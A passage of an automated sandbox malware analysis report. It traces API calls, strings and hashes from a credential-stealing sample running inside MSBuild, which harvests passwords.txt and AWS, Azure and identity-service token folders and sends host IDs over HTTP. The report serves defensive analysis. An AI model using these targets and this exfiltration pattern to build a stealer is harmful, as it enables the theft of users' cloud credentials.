                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 004087BE
                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 0040880B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                                                                                                                      • String ID: passwords.txt
                                                                                                                                                                                                                      • API String ID: 1956182324-347816968
                                                                                                                                                                                                                      • Opcode ID: e79cd5a6fe499fb7965201bd0776ad43c7a927167085e3e7bd657c15f75794a8
                                                                                                                                                                                                                      • Instruction ID: 9a12f6b0eacbcb2ed4cda68e664cf834d7366407d3e9ed4d657f0b87806d2d42
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e79cd5a6fe499fb7965201bd0776ad43c7a927167085e3e7bd657c15f75794a8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2814032900208AFCF05FFA1EE4A9CD7B76BF08316F205026F501B31A1EB7A5E559B59
                                                                                                                                                                                                                      Function 00404B2E Relevance: 35.4, APIs: 12, Strings: 8, Instructions: 378networkstringfileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                      • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?), ref: 00404BEB
                                                                                                                                                                                                                      • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404D83
                                                                                                                                                                                                                      • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00404DC7
                                                                                                                                                                                                                      • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404DF5
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,00436953,",build_id,004377C4,------,004377B8,",hwid,004377A4,------), ref: 004050EE
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,00000000), ref: 00405101
                                                                                                                                                                                                                      • HttpSendRequestA.WININET(00000000,?,00000000), ref: 0040510F
                                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040516C
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00405177
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 0040518E
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 0040519A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                                                                                                                                                      • String ID: "$"$------$------$------$8wA$build_id$hwid
                                                                                                                                                                                                                      • API String ID: 3006978581-858375883
                                                                                                                                                                                                                      • Opcode ID: 34a212d76a3bfc79e74cf83c5d1317f3bdb29bc58600130ec353d97f1a3d475c
                                                                                                                                                                                                                      • Instruction ID: 7219792e9a540e442724c4d24598c6325e7ae8fa207a63d5b21e459a2de286cb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 34a212d76a3bfc79e74cf83c5d1317f3bdb29bc58600130ec353d97f1a3d475c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C002C371D5512A9ACF20EB21CD46ADDB7B5FF04308F4140E6A54873191DAB87ECA8FD8
                                                                                                                                                                                                                      Function 00401666 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 129memoryfileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 00401696
                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 004016BC
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 004016E6
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 004016FE
                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00401705
                                                                                                                                                                                                                      • _time64.MSVCRT ref: 0040170E
                                                                                                                                                                                                                      • srand.MSVCRT ref: 00401715
                                                                                                                                                                                                                      • rand.MSVCRT ref: 0040171E
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0040172E
                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00401746
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00401763
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00401771
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0040178D
                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 004017A9
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 004017BE
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004017C8
                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(00000000), ref: 004017CF
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004017DB
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
                                                                                                                                                                                                                      • String ID: %s%s$delays.tmp
                                                                                                                                                                                                                      • API String ID: 1620473967-1413376734
                                                                                                                                                                                                                      • Opcode ID: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
                                                                                                                                                                                                                      • Instruction ID: 11c0bd3ed3d7e6805384e8c578cb98533790a078e52b8311c5bcc7c05517a4c3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B41C8B1900218ABD7205F61AC4CF9F7B7DEB89715F1006BAF109E10A1DA354E54CF28
                                                                                                                                                                                                                      Function 004164BD Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 114stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 004164E2
                                                                                                                                                                                                                        • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416501
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,\.azure\), ref: 0041651E
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00416556
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 00416578
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,\.aws\), ref: 00416595
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 00416229
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: DeleteFileA.KERNEL32(?), ref: 0041629D
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 004165CA
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 004165EC
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00416609
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0041663E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcat$File_memsetwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                                      • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                                                                                                                      • API String ID: 780282842-974132213
                                                                                                                                                                                                                      • Opcode ID: 76b6cfcc2cbbf7bce573afa5f5241ca90d425f37a5191db5c0e06d16ae103776
                                                                                                                                                                                                                      • Instruction ID: c1663bc4ae337e97e36098b0a6fa5269247debf2670cee4f463a309fb8bc2b96
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 76b6cfcc2cbbf7bce573afa5f5241ca90d425f37a5191db5c0e06d16ae103776
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2741C671D4021C7BDB14EB61EC47FDD7378AB09308F5044AAB605B7090EAB9AB888F59
                                                                                                                                                                                                                      Function 0040ABE5 Relevance: 33.3, APIs: 22, Instructions: 315stringmemoryfileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 0040AC8A
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040AD94
                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0040AD9B
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,004373DC,00000000), ref: 0040AE4C
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,004373E0), ref: 0040AE74
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,?), ref: 0040AE98
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,004373E4), ref: 0040AEA4
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,?), ref: 0040AEAE
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,004373E8), ref: 0040AEBA
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,?), ref: 0040AEC4
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,004373EC), ref: 0040AED0
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,?), ref: 0040AEDA
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,004373F0), ref: 0040AEE6
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,?), ref: 0040AEF0
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,004373F4), ref: 0040AEFC
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,?), ref: 0040AF06
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,004373F8), ref: 0040AF12
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,?), ref: 0040AF1C
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,004373FC), ref: 0040AF28
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040AF7A
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040AF95
                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 0040AFD8
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1956182324-0
                                                                                                                                                                                                                      • Opcode ID: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
                                                                                                                                                                                                                      • Instruction ID: ea3aaa4254ea011307d5ff1151e45a3af1a32ea2cb92a891b43a4b7d07102f87
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E6C15D32904208AFDF15EFA1ED4A9DD7B76EF04309F20102AF501B30A1DB7A6E959F95
                                                                                                                                                                                                                      Function 00417041 Relevance: 29.0, APIs: 8, Strings: 8, Instructions: 1029networksleepCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                                                                                                                                                        • Part of subcall function 00410C53: RtlAllocateHeap.NTDLL(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                                                                                                                                                        • Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,0041858F), ref: 004170DD
                                                                                                                                                                                                                      • OpenEventA.KERNEL32(001F0003,00000000,?,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004170EC
                                                                                                                                                                                                                      • CreateDirectoryA.KERNEL32(?,00000000,004366DA), ref: 0041760A
                                                                                                                                                                                                                      • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176CB
                                                                                                                                                                                                                      • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176E4
                                                                                                                                                                                                                        • Part of subcall function 00404B2E: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
                                                                                                                                                                                                                        • Part of subcall function 00404B2E: StrCmpCA.SHLWAPI(?), ref: 00404BEB
                                                                                                                                                                                                                        • Part of subcall function 004139C2: StrCmpCA.SHLWAPI(?,block,?,?,00417744), ref: 004139D7
                                                                                                                                                                                                                        • Part of subcall function 004139C2: ExitProcess.KERNEL32 ref: 004139E2
                                                                                                                                                                                                                        • Part of subcall function 00405F39: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
                                                                                                                                                                                                                        • Part of subcall function 00405F39: StrCmpCA.SHLWAPI(?), ref: 00405FF6
                                                                                                                                                                                                                        • Part of subcall function 00413198: strtok_s.MSVCRT ref: 004131B7
                                                                                                                                                                                                                        • Part of subcall function 00413198: strtok_s.MSVCRT ref: 0041323A
                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 00417A9A
                                                                                                                                                                                                                        • Part of subcall function 00405F39: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
                                                                                                                                                                                                                        • Part of subcall function 00405F39: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
                                                                                                                                                                                                                        • Part of subcall function 00405F39: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200
                                                                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,0041858F), ref: 00417100
                                                                                                                                                                                                                        • Part of subcall function 0041257F: __EH_prolog3_catch_GS.LIBCMT ref: 00412589
                                                                                                                                                                                                                        • Part of subcall function 0041257F: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
                                                                                                                                                                                                                        • Part of subcall function 0041257F: Process32First.KERNEL32(00000000,00000128), ref: 004125B8
                                                                                                                                                                                                                        • Part of subcall function 0041257F: Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
                                                                                                                                                                                                                        • Part of subcall function 0041257F: StrCmpCA.SHLWAPI(?), ref: 004125DC
                                                                                                                                                                                                                        • Part of subcall function 0041257F: CloseHandle.KERNEL32(00000000), ref: 004125F0
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00418000
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
